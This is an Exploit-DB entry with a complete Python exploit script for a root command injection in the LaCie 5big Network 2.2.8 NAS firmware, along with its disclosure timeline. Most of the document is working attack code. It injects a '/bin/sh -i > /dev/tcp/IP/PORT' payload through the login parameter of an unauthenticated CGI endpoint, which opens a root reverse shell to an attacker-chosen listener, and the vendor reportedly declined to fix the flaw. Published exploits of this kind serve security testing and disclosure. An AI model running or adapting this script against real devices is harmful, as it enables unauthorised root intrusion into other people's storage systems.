LaCie 5big Network 2.2.8 - Command Injection

EDB-ID:

43226

CVE:

N/A




Platform:

CGI

Date:

2017-12-07


#!/usr/bin/python

# Exploit Title: LaCie 5big Network 2.2.8 Command Injection
# Date: 2017-12-04
# Exploit Author: Timo Sablowski
# Contact: ${lastname}@tyntec.com
# Vendor Homepage: http://www.lacie.com
# Software Link: http://www.lacie.com/files/lacie-content/download/drivers/5%20Big%20Network.zip
# Version: 2.2.8
# Tested on: Linux
# Platform: Hardware
#
# Command Injection Vulnerability (with root privileges) in LaCie's
# 5big Network appliance running firmware version 2.2.8.
# Just open a netcat listener and run this script to receive a reverse
# shell to exploit the vulnerability.
#
# This exploit has been released to Seagate in accordance to their
# responsible disclosure program and is meant to be used for testing
# and educational purposes only.
# Please do not use it against any system without prior permission.
# Use at your own risk.
#
# Timeline:
# 	2017-09-13: Discovery
#	2017-10-04: Reporting to Seagate
#		asking to fix the issue until 2017-12-04
#	2017-11-07: Seagate stating to not fix the vulnerability as the
#		product has been EOL for a long time


import sys, getopt, os, urllib

url_addition = "/cgi-bin/public/edconfd.cgi?method=getChallenge&login="
blank_payload = "admin|#' ||`/bin/sh -i > /dev/tcp/IP/PORT 0<&1 2>&1` #\\\""

def help():
	print "Usage:"
	print "%s -u <baseurl> -l <listener> -p <port>" %os.path.basename(sys.argv[0])
	print ""
	print "<baseurl> identifies the target's URL, e.g. http://10.0.0.1:8080"
	print "<listener> sets the IP where the attacked system connects back to"
	print "<port> defines the listening port"
	print ""
	print "Example: attack LaCie system to connect back to a remote machine (do not forget to open a netcat session)"
	print "\t %s -u http://10.0.0.1 -l 192.168.0.1 -p 4444" %os.path.basename(sys.argv[0])


def create_payload(blank_payload, listener, port):
	print "[+] Generating payload with IP %s and port %s" %(listener, str(port))
	payload = blank_payload.replace("IP", listener).replace("PORT", str(port))
	payload = urllib.quote(payload, safe='')
	return payload


def send_payload(injected_url):
	print "[+] Sending payload, this might take a few seconds ..."
	print "[+] Check your listener"
	try:
		urllib.urlopen(injected_url)
	except:
		raise


def main():
	try:
		opts, args = getopt.getopt(sys.argv[1:],"hu:l:p:")
	except:
		help()
		sys.exit(1)
	for opt, arg in opts:
		if opt == '-h':
			help()
			sys.exit()
		elif opt in ("-u"):
			url = arg
		elif opt in ("-l"):
			listener = arg
		elif opt in ("-p"):
			port = int(arg)
	try:
		url
		listener
		port
	except:
		help()
		sys.exit(1)

	payload = create_payload(blank_payload, listener, port)
 	injected_url = "%s%s%s" %(url, url_addition, payload)
 	send_payload(injected_url)



if __name__ == "__main__":
	main()